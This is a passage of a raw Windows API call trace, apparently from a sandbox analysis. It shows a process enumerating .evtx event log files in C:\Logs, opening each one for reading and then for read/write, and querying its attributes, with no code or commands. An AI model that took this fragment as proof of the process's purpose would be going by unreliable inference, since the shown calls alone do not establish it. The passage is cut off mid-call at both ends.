RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0086.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.994] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0086.995] AreFileApisANSI () returned 1 [0086.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx", lpUsedDefaultChar=0x0) returned 59 [0086.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0086.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0086.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0086.995] AreFileApisANSI () returned 1 [0086.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0086.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0086.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 59 [0086.995] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.995] GetFileType (hFile=0x424) returned 0x1 [0086.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0086.995] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.996] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.996] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.996] CloseHandle (hObject=0x424) returned 1 [0086.996] AreFileApisANSI () returned 1 [0086.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0086.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0086.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 59 [0086.996] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.996] GetFileType (hFile=0x424) returned 0x1 [0086.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0086.996] CloseHandle (hObject=0x424) returned 1 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.997] AreFileApisANSI () returned 1 [0086.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0086.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a5b0 [0086.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 59 [0086.997] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0086.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0086.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.997] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Ntfs%4Operational.evtx", cAlternateFileName="MI6E98~1.EVT")) returned 1 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0086.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0086.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.999] AreFileApisANSI () returned 1 [0086.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0086.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0086.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0086.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0086.999] AreFileApisANSI () returned 1 [0086.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0086.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x464a8 [0086.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x464a8, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 49 [0086.999] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.999] GetFileType (hFile=0x424) returned 0x1 [0086.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0086.999] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.000] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.112] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.117] CloseHandle (hObject=0x424) returned 1 [0087.117] AreFileApisANSI () returned 1 [0087.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0087.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46ac8 [0087.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x46ac8, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 49 [0087.123] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.127] GetFileType (hFile=0x424) returned 0x1 [0087.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0087.137] CloseHandle (hObject=0x424) returned 1 [0087.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.146] AreFileApisANSI () returned 1 [0087.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x467b8 [0087.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x467b8, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 49 [0087.146] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0087.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.146] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ad9393, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ad9393, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Ntfs%4WHC.evtx", cAlternateFileName="MIB2AC~1.EVT")) returned 1 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0087.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0087.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0087.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0087.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0087.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0087.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0087.147] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.147] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.147] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.147] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0087.147] AreFileApisANSI () returned 1 [0087.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx", 